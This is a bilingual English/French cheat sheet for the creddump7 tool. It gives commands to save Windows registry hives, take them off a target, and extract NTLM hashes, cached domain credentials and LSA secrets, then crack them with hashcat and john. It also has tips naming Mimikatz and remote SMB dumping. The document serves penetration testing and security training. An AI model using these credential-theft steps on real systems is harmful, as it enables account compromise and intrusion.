creddump7
Extracteur d'identifiants Windows pour ruches de registre hors ligne. Extrait empreintes de mots de passe, identifiants en cache et secrets LSA depuis les fichiers de registre SAM, SYSTEM et SECURITY hors ligne. Windows credential dumper for offline registry hives. Extracts password hashes, cached credentials, and LSA secrets from offline SAM, SYSTEM, and SECURITY registry files.
↗ https://github.com/CiscoCXSecurity/creddump7Overview
creddump7 is a Python tool for extracting Windows credentials from offline registry hive files. It handles SAM hashes, cached domain credentials (MSCache/MSCache2), and LSA secrets — useful when you have filesystem access but can’t run in-memory tools like Mimikatz.
Basic Usage
Dump SAM hashes (requires SAM + SYSTEM hives)
python3 pwdump.py SYSTEM SAM
Dump cached domain credentials (MSCache2)
python3 cachedump.py SYSTEM SECURITY
Dump LSA secrets
python3 lsadump.py SYSTEM SECURITY
Collecting Hives
# From Windows (as SYSTEM or admin):
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY
# From shadow copy (Volume Shadow Copy)
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM
# Copy files off target, then run creddump locally
Dump SAM Hashes
pwdump - outputs NTLM hashes in john/hashcat format
python3 pwdump.py /path/to/SYSTEM /path/to/SAM
# Output format:
# Administrator:500:LM_HASH:NT_HASH:::
# Guest:501:NO PASSWORD:::
# user:1000:LM_HASH:NT_HASH:::
Dump Cached Credentials
Cached domain credentials (DCC2/MSCache2)
python3 cachedump.py /path/to/SYSTEM /path/to/SECURITY
# Output: $DCC2$10240#username#hash
# Crack with hashcat -m 2100
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt
Dump LSA Secrets
LSA secrets contain service account passwords, auto-logon creds, etc.
python3 lsadump.py /path/to/SYSTEM /path/to/SECURITY
# Common LSA secrets:
# $MACHINE.ACC — machine account password
# DefaultPassword — auto-logon password
# DPAPI_SYSTEM — DPAPI master key
# _SC_ServiceName — service account passwords
Cracking Extracted Hashes
Crack NTLM hashes with hashcat
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
Or with john
john --format=NT ntlm_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Crack MSCache2 (slower)
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt
Tips
- Requires both SYSTEM and SAM hives — the SYSTEM hive contains the boot key (syskey)
- For live systems, prefer Mimikatz or impacket-secretsdump over offline tools
- LSA secrets often contain cleartext service account passwords — high value
- Cached credentials (DCC2) are slow to crack — prioritize NTLM hashes first
- Use impacket’s
secretsdump.pyfor remote dumping over SMB
Help / Man page
Scripts:
pwdump.py SYSTEM SAM — Dump local NTLM hashes
cachedump.py SYSTEM SECURITY — Dump cached domain credentials (DCC2)
lsadump.py SYSTEM SECURITY — Dump LSA secrets
All scripts take hive files as positional arguments.
SYSTEM hive is required for all (contains syskey/boot key).
Vue d’ensemble
creddump7 est un outil Python pour extraire des identifiants Windows depuis des fichiers de ruche de registre hors ligne. Il gère les empreintes SAM, les identifiants de domaine en cache (MSCache/MSCache2), et les secrets LSA : utile quand vous avez un accès au système de fichiers mais ne pouvez pas lancer d’outils en mémoire comme Mimikatz.
Utilisation de base
# Extraire les empreintes SAM (nécessite les ruches SAM + SYSTEM)
python3 pwdump.py SYSTEM SAM
# Extraire les identifiants de domaine en cache (MSCache2)
python3 cachedump.py SYSTEM SECURITY
# Extraire les secrets LSA
python3 lsadump.py SYSTEM SECURITY
Collecter les ruches
# Depuis Windows (en tant que SYSTEM ou admin) :
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY
# Depuis une shadow copy (Volume Shadow Copy)
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM
# Copier les fichiers hors de la cible, puis lancer creddump en local
Extraire les empreintes SAM
# pwdump : produit les empreintes NTLM au format john/hashcat
python3 pwdump.py /path/to/SYSTEM /path/to/SAM
# Format de sortie :
# Administrator:500:LM_HASH:NT_HASH:::
# Guest:501:NO PASSWORD:::
# user:1000:LM_HASH:NT_HASH:::
Extraire les identifiants en cache
# Identifiants de domaine en cache (DCC2/MSCache2)
python3 cachedump.py /path/to/SYSTEM /path/to/SECURITY
# Sortie : $DCC2$10240#username#hash
# Cracker avec hashcat -m 2100
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt
Extraire les secrets LSA
# Les secrets LSA contiennent des mots de passe de comptes de service, des identifiants d'auto-logon, etc.
python3 lsadump.py /path/to/SYSTEM /path/to/SECURITY
# Secrets LSA courants :
# $MACHINE.ACC : mot de passe du compte machine
# DefaultPassword : mot de passe d'auto-logon
# DPAPI_SYSTEM : clé maîtresse DPAPI
# _SC_ServiceName : mots de passe de comptes de service
Cracker les empreintes extraites
# Cracker les empreintes NTLM avec hashcat
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
# Ou avec john
john --format=NT ntlm_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Cracker le MSCache2 (plus lent)
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt
Conseils
- Nécessite à la fois les ruches SYSTEM et SAM : la ruche SYSTEM contient la boot key (syskey)
- Pour les systèmes vivants, préférez Mimikatz ou impacket-secretsdump aux outils hors ligne
- Les secrets LSA contiennent souvent des mots de passe de comptes de service en clair : grande valeur
- Les identifiants en cache (DCC2) sont lents à cracker : priorisez d’abord les empreintes NTLM
- Utilisez le
secretsdump.pyd’impacket pour une extraction à distance via SMB
Aide / Page de manuel
Scripts:
pwdump.py SYSTEM SAM — Dump local NTLM hashes
cachedump.py SYSTEM SECURITY — Dump cached domain credentials (DCC2)
lsadump.py SYSTEM SECURITY — Dump LSA secrets
All scripts take hive files as positional arguments.
SYSTEM hive is required for all (contains syskey/boot key).